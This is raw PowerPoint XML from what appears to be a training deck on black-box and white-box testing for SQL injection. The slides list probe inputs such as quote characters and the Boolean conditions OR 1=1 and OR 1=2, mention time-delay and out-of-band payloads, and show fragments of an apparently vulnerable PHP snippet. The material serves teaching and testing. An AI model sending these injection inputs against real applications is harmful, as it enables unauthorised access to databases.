              <a:t>$query</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1300" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>);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 spc="-114">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?&gt;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4097372" y="4480931"/>
            <a:ext cx="3829050" cy="3271520"/>
            <a:chOff x="14097372" y="4480931"/>
            <a:chExt cx="3829050" cy="3271520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14113078" y="5306581"/>
              <a:ext cx="2987675" cy="2430145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2987675" h="2430145">
                  <a:moveTo>
                    <a:pt x="2987343" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2429810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987343" y="2429810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987343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0421" y="4496637"/>
              <a:ext cx="810260" cy="3239770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="810259" h="3239770">
                  <a:moveTo>
                    <a:pt x="809922" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="809943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3239754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809922" y="2429810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809922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113078" y="4496637"/>
              <a:ext cx="3797300" cy="810260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3797300" h="810260">
                  <a:moveTo>
                    <a:pt x="3797266" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="810027" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="809943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987343" y="809943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3797266" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5151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113078" y="4496637"/>
              <a:ext cx="3797300" cy="3239770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3797300" h="3239770">
                  <a:moveTo>
                    <a:pt x="0" y="809938"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="809937" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3797190" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3797190" y="2429815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987246" y="3239751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3239751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="809938"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3797300" h="3239770">
                  <a:moveTo>
                    <a:pt x="0" y="809938"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2987246" y="809938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3797190" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3797300" h="3239770">
                  <a:moveTo>
                    <a:pt x="2987246" y="809938"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2987246" y="3239751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77989" y="2649419"/>
            <a:ext cx="11931650" cy="7035165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1345"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Map </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr sz="425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spcBef>
                <a:spcPts val="1250"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-405">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Fuzz </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr sz="4250">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
                <a:tab pos="8754110" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL-specific </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>characters </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>look</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-645"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for  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>errors </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-415">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>anomalies</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" marR="443865" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="725"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>conditions </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>such </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-520">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-520">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1=2,  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>look </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>differences </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-735">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application's </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>responses</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" marR="393700" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="90700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>designed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>time </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>delays </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>executed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>within </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-525">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>query, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>look </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>differences</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>time </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>taken </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-540">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>respond</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" lvl="1" marL="1143000" marR="46355" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="90700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-484">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OAST </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>designed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>out-of-band  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>network </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interaction </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>executed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>within </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-525">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>query,  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>resulting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-520">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interactions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30922" y="951500"/>
            <a:ext cx="10795635" cy="11099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100" spc="-360"/>
              <a:t>Black-Box </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-405"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-710"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-325"/>
              <a:t>Perspective</a:t>
            </a:r>
            <a:endParaRPr sz="7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951500"/>
            <a:ext cx="11144885" cy="11099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100" spc="-245"/>
              <a:t>White-Box </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-405"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-810"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-325"/>
              <a:t>Perspective</a:t>
            </a:r>
            <a:endParaRPr sz="71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03456" y="4523422"/>
            <a:ext cx="4135120" cy="3484879"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4135119" h="3484879">
                <a:moveTo>
                  <a:pt x="0" y="871070"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="871070" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4134699" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4134699" y="2613196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3263636" y="3484258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3484258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="871070"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4135119" h="3484879">
                <a:moveTo>
                  <a:pt x="0" y="871070"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3263636" y="871070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4134699" y="0"/>
                </a:lnTo>
              </a:path>
              <a:path w="4135119" h="3484879">
                <a:moveTo>
                  <a:pt x="3263636" y="871070"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3263636" y="3484258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827297" y="5826284"/>
            <a:ext cx="42481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85">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>php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27297" y="6203236"/>
            <a:ext cx="3014345" cy="9683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2705">
              <a:lnSpc>
                <a:spcPct val="103099"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$offset </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$argv</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="140">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
